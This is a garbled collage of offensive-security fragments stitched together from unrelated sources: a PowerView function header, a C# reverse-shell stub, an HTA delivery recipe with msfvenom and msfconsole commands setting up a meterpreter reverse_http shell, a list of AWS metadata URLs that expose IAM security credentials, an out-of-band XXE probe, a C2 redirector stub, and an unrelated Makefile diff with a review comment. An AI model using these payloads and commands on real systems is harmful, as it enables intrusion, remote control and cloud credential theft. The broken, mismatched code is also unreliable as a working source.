function Get-NetUser {
<#
.SYNOPSIS
Query information for a given user or users in the domain.
.DESCRIPTION
This function uses [ADSI] and LDAP to query the current
domain for all users. Another domain can be specified to
query for users across a trust.
This is a replacement for "net users /domain"
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs
# sms.py
# Sends sms message to any cell phone using gmail smtp gateway
# Written by Alex Le
import smtplib
# Use sms gateway provided by mobile carrier:
# at&t: number@mms.att.net
# t-mobile: number@tmomail.net
# verizon: number@vtext.com
<html>
<!--
Example By Casey Smith @subTee
Generate Shellcode:
msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba
Wrap Shellcode in HTA
Deliver
Start Msf
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j"
Wait for Shells to Rain
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
diff --git a/Makefile.pre.in b/Makefile.pre.in | |
index bcd83bf..efbfd8d 100644 | |
--- a/Makefile.pre.in | |
+++ b/Makefile.pre.in | |
@@ -461,6 +461,7 @@ sharedmods: $(BUILDPYTHON) pybuilddir.txt | |
esac; \ | |
$(RUNSHARED) CC='$(CC)' LDSHARED='$(BLDSHARED)' OPT='$(OPT)' \ | |
_TCLTK_INCLUDES='$(TCLTK_INCLUDES)' _TCLTK_LIBS='$(TCLTK_LIBS)' \ | |
+ PYTHONXCPREFIX='$(DESTDIR)$(prefix)' \ | |
$(PYTHON_FOR_BUILD) $(srcdir)/setup.py $$quiet build |
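Review bot: the added PYTHONXCPREFIX line in the sharedmods recipe has no comment or accompanying documentation in the visible part of the patch saying what consumes the variable or what path it is expected to hold. It also expands $(DESTDIR) during the build step; DESTDIR is conventionally set only for staged installs, so when it is empty the value falls back to plain $(prefix), which on a cross build may point at the build host's own tree. Consider documenting the variable next to the recipe and deriving it from an explicit configure-time setting rather than from DESTDIR.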
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
import logging
import urllib
import webapp2
import urllib2
# v1.0.1 - updated to support POST request
# change to your IP
redirector = "(insert you C2 domain here)"